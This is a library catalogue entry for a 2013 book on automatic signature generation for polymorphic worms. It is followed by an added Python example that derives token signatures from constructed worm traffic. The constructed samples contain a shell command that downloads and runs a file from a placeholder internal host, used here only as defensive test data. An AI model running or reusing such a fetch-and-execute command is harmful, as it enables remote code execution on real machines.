Automatic defense against zero-day polymorphic worms in communication networks

Bibliographic Details
Main Authors: Mohammed, Mohssen; Pathan, Al-Sakib Khan
Format: Book
Language: English
Published: CRC Press, USA 2013
Subjects:
Online Access:http://irep.iium.edu.my/25812/
http://irep.iium.edu.my/25812/1/Auto_Defense_polyworm_COVER.jpg
http://irep.iium.edu.my/25812/3/PREFACE_AuthBIO_Worm_CRC.pdf
Description
Summary: Internet worms are a major threat to Internet infrastructure, and the damage they cause is costly. A computer worm is a malicious program that replicates itself automatically across a computer network. Worms are a serious threat to computers connected to the Internet and to its proper functioning. They spread by exploiting low-level software defects and can use their victims for illegitimate activity such as corrupting data, sending unsolicited e-mail, generating traffic for distributed denial-of-service (DDoS) attacks, or stealing information. The speed at which a worm propagates is itself a serious security threat to the Internet.

A polymorphic worm changes its payload on every infection attempt, so that no two copies look alike on the wire. This lets it evade signature-based intrusion detection systems (IDSs) while it damages data, slows the network, steals information, and causes other harm, including large financial losses.

To defend a network against worms, IDSs such as Bro and Snort are commonly deployed at the boundary between the network and the Internet. Their main principle is to analyze traffic and compare it against the signatures stored in their databases. Whenever a novel worm is detected on the Internet, the usual approach is for experts in the security community to analyze the worm code manually and produce a signature, which is then distributed so that each IDS can update its database. This way of creating signatures is labour-intensive and slow, and against very fast-replicating threats such as zero-day polymorphic worms, which can take only seconds to bring down an entire network, an alternative is needed. The alternative is to generate signatures automatically, so that they are produced much faster and are still of acceptable quality.

This book focuses on how signatures for unknown polymorphic worms can be generated automatically.
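The summary contrasts byte-exact signatures written by hand with signatures generated automatically from captured worm traffic. The example below is added here to make that contrast concrete; it is not code from the book or its authors, and it uses a deliberately simplified version of the token-based approach found in automated generators such as Polygraph: the parts of a polymorphic worm that must stay fixed for the exploit to work (request framing, return-address overwrite, decoder stub) are extracted as the substrings common to every captured sample, and the signature is an ordered conjunction of those tokens. The worm samples, the "vulnerable" request path, the return address, the decoder bytes and the benign flows are all constructed for the example; none correspond to a real exploit.

```python
"""
Added example (not from the book): automatic signature generation for a
polymorphic worm from a handful of captured samples. All samples are constructed.
"""
import random

# --- Constructed, hypothetical worm: fixed exploit framing + polymorphic parts ---
PREFIX = b"GET /cgi-bin/index.php?id="            # assumed vulnerable request path
RET_ADDR = b"\x7f\xff\x12\x34"                     # fake return-address overwrite (fixed)
DECODER = b"\xeb\x0e\x5e\x31\xc9"                  # fake decoder stub (fixed)
PLAINTEXT = b"/bin/sh -c 'wget http://10.0.0.1/w; ./w'"  # real payload, XOR-encoded per infection
HTTP_TAIL = b" HTTP/1.1\r\nHost: "
CRLF2 = b"\r\n\r\n"
ALNUM = b"abcdefghijklmnopqrstuvwxyz0123456789"


def make_worm_sample(rng):
    """One infection attempt: random filler, fresh XOR key, random Host header."""
    filler = bytes(rng.randrange(256) for _ in range(rng.randint(30, 60)))
    key = rng.randrange(1, 256)
    encoded = bytes(b ^ key for b in PLAINTEXT)            # payload differs per sample
    host = bytes(rng.choice(ALNUM) for _ in range(rng.randint(6, 10)))
    return PREFIX + filler + RET_ADDR + DECODER + bytes([key]) + encoded + HTTP_TAIL + host + CRLF2


def make_benign_sample(rng):
    """A legitimate request to the same script, used to check for false positives."""
    ident = str(rng.randint(1, 99999)).encode()
    host = bytes(rng.choice(ALNUM) for _ in range(rng.randint(6, 10)))
    return PREFIX + ident + HTTP_TAIL + host + CRLF2


RNG = random.Random(1337)                                   # constructed, deterministic corpus
WORM_SAMPLES = [make_worm_sample(RNG) for _ in range(5)]
BENIGN_SAMPLES = [make_benign_sample(RNG) for _ in range(20)]


def exact_payload_signature_rate(samples):
    """What a byte-exact signature taken from the first capture achieves against
    a polymorphic worm: it matches only that one sample."""
    return sum(s == samples[0] for s in samples) / len(samples)


def invariant_tokens(samples, min_len=4):
    """Greedy extraction of maximal substrings (>= min_len bytes) present in every
    sample, in the order they occur in the first one. Filler, key, encoded payload
    and Host vary between samples, so only the exploit framing survives."""
    base, others = samples[0], samples[1:]
    tokens, i = [], 0
    while i <= len(base) - min_len:
        end = 0
        for j in range(i + min_len, len(base) + 1):
            if all(base[i:j] in s for s in others):
                end = j                                     # extend while still shared
            else:
                break
        if end:
            tokens.append(base[i:end])
            i = end
        else:
            i += 1
    return tokens


def matches(signature, payload):
    """Ordered conjunction: every token must occur, each after the previous one."""
    pos = 0
    for tok in signature:
        idx = payload.find(tok, pos)
        if idx < 0:
            return False
        pos = idx + len(tok)
    return True


def token_specificity(tokens, benign):
    """Fraction of benign flows containing each token on its own. A token at 1.0
    adds no discrimination by itself; the signature relies on the others."""
    return {tok: sum(tok in b for b in benign) / len(benign) for tok in tokens}


def evaluate(signature, worm_samples, benign_samples):
    """Return (detection rate over worm samples, false-positive rate over benign flows)."""
    det = sum(matches(signature, s) for s in worm_samples) / len(worm_samples)
    fpr = sum(matches(signature, b) for b in benign_samples) / len(benign_samples)
    return det, fpr


SIGNATURE = invariant_tokens(WORM_SAMPLES)

if __name__ == "__main__":
    print("exact-match signature detects:", exact_payload_signature_rate(WORM_SAMPLES))
    for tok in SIGNATURE:
        print("token:", tok)
    print(token_specificity(SIGNATURE, BENIGN_SAMPLES))
    print("token signature (detection, fpr):", evaluate(SIGNATURE, WORM_SAMPLES, BENIGN_SAMPLES))
```

Run stand-alone, the script shows the two points the summary makes: a byte-exact signature from the first capture detects one sample in five, while the generated token signature detects all five with no false positives on the benign flows. The specificity table also shows why a generator needs benign traffic as well as worm samples: the request prefix and HTTP trailer occur in every legitimate request, and only the return-address and decoder bytes make the conjunction specific, so a generator that emitted the prefix alone would flood the IDS with false alarms.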